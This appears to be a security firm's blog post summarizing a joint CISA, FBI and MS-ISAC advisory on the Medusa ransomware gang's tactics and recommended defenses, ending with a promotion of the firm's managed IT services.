Medusa Ransomware: Rising Threat to Critical Sectors
The Medusa ransomware gang has emerged as a significant threat, tallying over 300 victims across critical infrastructure sectors, including healthcare, manufacturing, and technology. This alarming statistic comes from a joint cybersecurity advisory released by CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) on Wednesday.
Since its inception in 2021, Medusa has evolved from a closed ransomware operation to an affiliate model, allowing it to expand its reach. Despite this shift, crucial operations such as ransom negotiations remain centrally controlled by the original developers. The advisory highlights that both the developers and their affiliates, referred to as “Medusa actors,” utilize a double extortion model—encrypting victim data and threatening to publicly expose exfiltrated information unless a ransom is paid.
According to the advisory, Medusa developers often collaborate with initial access brokers on cybercriminal forums to infiltrate victims’ environments. Once inside, Medusa actors employ a variety of legitimate software tools to move laterally within networks. They also utilize network scanning tools like Advanced IP Scanner and SoftPerfect Network Scanner to gather intelligence on targeted users and systems.
The advisory notes that Medusa actors frequently use living-off-the-land (LotL) techniques to evade detection. This includes sophisticated PowerShell methods and the use of vulnerable or signed drivers in a tactic known as “bring your own vulnerable driver” (BYOVD) attacks. These techniques enable the attackers to disable endpoint detection and response (EDR) products, significantly hindering the victims’ defenses.
A recent blog post from Symantec’s Threat Hunter team highlighted a 42% increase in Medusa activity year-over-year in 2024, with continued growth observed in January and February. The researchers pointed out the extensive use of both legitimate drivers and custom-developed malicious tools, such as AVKill and POORTRY, to bypass security measures.
In an investigation of an attack against a healthcare organization in January, the Threat Hunter team found that the Medusa actors employed AVKill, POORTRY, and an undisclosed driver to incapacitate the organization’s defenses. Additionally, they used RClone, an open-source tool, for data exfiltration and PsExec to issue remote commands. Notably, the ransomware executable would delete itself after encrypting targeted systems and files, complicating recovery efforts.
Considering the rising threat posed by the Medusa ransomware gang, CISA, the FBI, and MS-ISAC recommend several protective measures, including:
- Disabling command-line and scripting activities to limit LotL techniques.
- Implementing strict permissions to control access and minimize privilege escalation opportunities.
The advisory emphasizes that if threat actors are unable to execute these tools, they will face significant challenges in escalating privileges or moving laterally within networks.
As the threat landscape continues to evolve, organizations must remain vigilant and proactive in their cybersecurity measures to combat the increasing prevalence of ransomware attacks like those perpetrated by the Medusa gang.
At 2W Tech, we specialize in helping organizations protect themselves against ransomware threats like Medusa. Through our managed IT services and advanced cybersecurity solutions, we work to ensure your systems are fortified against potential vulnerabilities. Our comprehensive approach includes implementing robust endpoint protection to guard against BYOVD attacks, conducting regular vulnerability assessments to identify and resolve weak points, and deploying advanced monitoring and detection tools to identify malicious activity before it escalates. Additionally, we assist organizations in developing incident response plans designed to minimize downtime and ensure a swift recovery from potential attacks. Partnering with 2WTech means gaining a dedicated ally in the fight against evolving cybersecurity threats.
Read More: